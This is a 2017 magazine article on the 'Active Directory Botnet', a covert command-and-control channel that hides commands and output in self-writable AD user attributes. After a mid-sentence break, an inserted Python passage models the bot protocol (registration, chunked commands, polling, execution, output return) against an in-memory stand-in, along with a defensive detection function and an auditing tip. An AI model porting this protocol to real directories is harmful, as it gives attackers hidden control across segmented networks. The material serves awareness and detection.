Australian Cyber Security Magazine, ISSUE 3, 2017

Page 44

Cyber Security

The active directory botnet

By Ty Miller

Botnets and command & control servers (a.k.a. C&C or C2 servers) are spreading across the internet and are rapidly becoming a major new threat. Recent industry research from Verizon highlights how control of a machine is unwittingly handed to an attacker. The “Verizon 2017 Data Breach Investigations Report” reveals that “phishing remains a favourite technique of attackers” and that “payloads are commonly delivered via email (73%) and driveby downloads (13%)”. The report continues: “if the attachment is opened, it will drop command and control malware to establish and maintain control of the device”.

A life of their own

There are many ways in which botnets and C&C servers can become a threat in their own right. What happens when these botnets and C&C servers start existing and operating inside the walls of our organisations? What damage could they do if they bypass our network controls, or if they began communicating internally in a way that bypasses our security zones and firewalls? It makes you wonder what would happen if modern controls such as microsegmentation were all of a sudden useless. These nightmare scenarios are well on their way to becoming a reality.

The Active Directory Botnet attack concept arises from a fundamental flaw in the way nearly every organisation implements its Active Directory (AD) solution, which leaves a gaping hole in its security and in its ability to contain a breach.

Let’s say that your organisation has become the victim of a spear phishing attack and a range of your internal systems across multiple WAN sites around the world have been breached. Not only this, but some of your internet-exposed systems in your DMZ and Azure cloud environment have also been breached. This sounds bad, but luckily your security team have segmented all of these systems into security zones with firewalls and network filtering to contain the breaches.

Microsoft Active Directory is used by most organisations as their central authentication and identity management solution. Due to the architecture of nearly every Active Directory implementation on the planet, almost all servers, workstations, laptops, mobile devices and wireless devices throughout your organisation can connect to an Active Directory Domain Controller for authentication purposes. In other words, the firewall rules that permit authentication also give every one of those breached systems, in every zone, a path to the same directory.

Identifying compromised machines


The Active Directory Botnet Client, or “Bot”, is the backdoor installed on each of the compromised machines. It updates the standard Active Directory attributes of the user currently logged in on that machine, which is also how it registers with the internal Active Directory Botnet. No elevated privileges are needed for this: by default a domain user account is permitted to modify a set of its own attributes, including the personal-information attributes such as phone numbers and postal address.

Standard Active Directory user accounts support over 50 user attributes, such as name, IP phone, postal address and info, which can be combined to create a covert communication channel between any compromised domain-joined machines located throughout your organisation. These standard user attributes range in size from a small number of bytes through to one megabyte, which provides sufficient bandwidth for sending commands, receiving command output, and uploading or downloading files between the infected endpoints.

The Active Directory Botnet Client injects unique command and control data entries into the attributes of its corresponding AD account on the target Domain Controller, and the directory then automatically replicates that data to every Active Directory Domain Controller throughout the organisation. At this point, any Active Directory Botnet Client within the domain can identify the compromised machines by querying its Domain Controller and begin issuing commands to be executed on any of the infected endpoints. When one of the Bots injects a command into its Domain Controller, every infected machine polls its Domain
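How the pieces above fit together, as an added example that is neither the author's tooling nor code from the magazine: a Python model of the channel in which a dictionary stands in for the replicated directory. The attribute names are real user attributes; the `ADBOT:` marker, the 64-character per-value limit, the chunking scheme, the JSON message format and the sample accounts (alice, bob, carol) are all assumptions constructed for the example, and the `Directory` class marks where a real bot would perform an LDAP modify of its own user object and an LDAP search of the others. The `hunt()` function is the defender's side of the same data: it flags accounts whose free-text attributes carry long base64 runs, which a phone number or address never does.

```python
"""Model of the Active Directory Botnet covert channel described above.
Added example, not the author's tooling. A dict stands in for the replicated
directory: in a real domain write_self() would be an LDAP modify of the caller's
own user object and read() an LDAP search, both possible as a plain domain user.
The marker, per-value size limit, chunking and message format are assumptions."""
import base64
import json
import re

MARKER = "ADBOT:"      # assumed tag that lets bots recognise channel entries
CHUNK_ATTRS = ["info", "postalAddress", "streetAddress", "postOfficeBox"]
MAX_VALUE_LEN = 64     # assumed per-value limit; real rangeUpper differs per attribute
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")   # what a defender looks for


class Directory:
    """In-memory stand-in for the domain's user objects (already replicated)."""
    def __init__(self, accounts):
        self.users = {a: {} for a in accounts}

    def write_self(self, account, attrs):   # SELF write on the caller's own object
        self.users[account].update(attrs)

    def read(self, account):                # any authenticated user may read
        return dict(self.users[account])


def encode_message(msg):
    """JSON -> base64 -> fixed-size chunks, one chunk per attribute value."""
    raw = base64.b64encode(json.dumps(msg).encode()).decode()
    limit = MAX_VALUE_LEN - len(MARKER)
    chunks = [MARKER + raw[i:i + limit] for i in range(0, len(raw), limit)]
    if len(chunks) > len(CHUNK_ATTRS):
        raise ValueError("message exceeds channel capacity")
    return chunks


def decode_message(values):
    """Reassemble the chunks carried in the channel attributes, ignoring normal values."""
    raw = "".join(v[len(MARKER):] for v in values if v.startswith(MARKER))
    return json.loads(base64.b64decode(raw)) if raw else None


class Bot:
    """One infected domain member, acting as the logged-in user `account`."""
    def __init__(self, directory, account, host):
        self.dir, self.account, self.host = directory, account, host
        self.seen = set()                   # command ids already executed

    def post(self, msg):
        attrs = {a: "" for a in CHUNK_ATTRS}        # clear stale chunks first
        attrs.update(zip(CHUNK_ATTRS, encode_message(msg)))
        self.dir.write_self(self.account, attrs)

    def register(self):
        self.post({"bot": self.host})

    def entries(self):
        """Read every other account's entry; this is how bots find each other."""
        found = {}
        for acct in self.dir.users:
            msg = decode_message([self.dir.read(acct).get(a, "") for a in CHUNK_ATTRS])
            if msg and acct != self.account:
                found[acct] = msg
        return found

    def issue(self, cmd_id, target, command):
        """The issuer writes the command into its OWN entry; the target reads it."""
        self.post({"bot": self.host, "cmd": {"id": cmd_id, "to": target, "run": command}})

    def poll(self, executor):
        """Run any unseen command addressed to this host and publish its output."""
        for entry in self.entries().values():
            cmd = entry.get("cmd")
            if cmd and cmd["to"] == self.host and cmd["id"] not in self.seen:
                self.seen.add(cmd["id"])
                self.post({"bot": self.host, "out": {"id": cmd["id"], "for": entry["bot"],
                                                     "result": executor(cmd["run"])}})
                return cmd["run"]
        return None

    def collect(self, cmd_id):
        for entry in self.entries().values():
            out = entry.get("out")
            if out and out["id"] == cmd_id and out["for"] == self.host:
                return out["result"]
        return None


def hunt(directory):
    """Defender check: accounts whose text attributes hold long base64 runs."""
    return sorted({acct for acct in directory.users
                   for v in directory.read(acct).values() if B64_RUN.search(v)})


def scenario():
    """A DMZ bot and an internal bot that share nothing but the directory."""
    ad = Directory(["alice", "bob", "carol"])          # constructed sample domain
    ad.write_self("carol", {"info": "Finance team lead", "postOfficeBox": "PO Box 12"})
    dmz, lan = Bot(ad, "alice", "dmz-web01"), Bot(ad, "bob", "corp-ws42")
    dmz.register(); lan.register()
    dmz.issue(1, "corp-ws42", "hostname")
    ran = lan.poll(lambda c: "corp-ws42" if c == "hostname" else "")
    return ran, dmz.collect(1), lan.poll(lambda c: "again"), hunt(ad)
```

`scenario()` returns the command the internal bot executed, the output the DMZ bot collected, `None` for the second poll (the command id has already been seen, so it is not re-run), and the two accounts `hunt()` flags; carol's genuine attribute values are left alone. In a real domain `hunt()` becomes an LDAP query over all user objects, and for ongoing detection the same attributes can be watched through directory service change auditing (Event ID 5136), which requires a SACL on the user objects.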

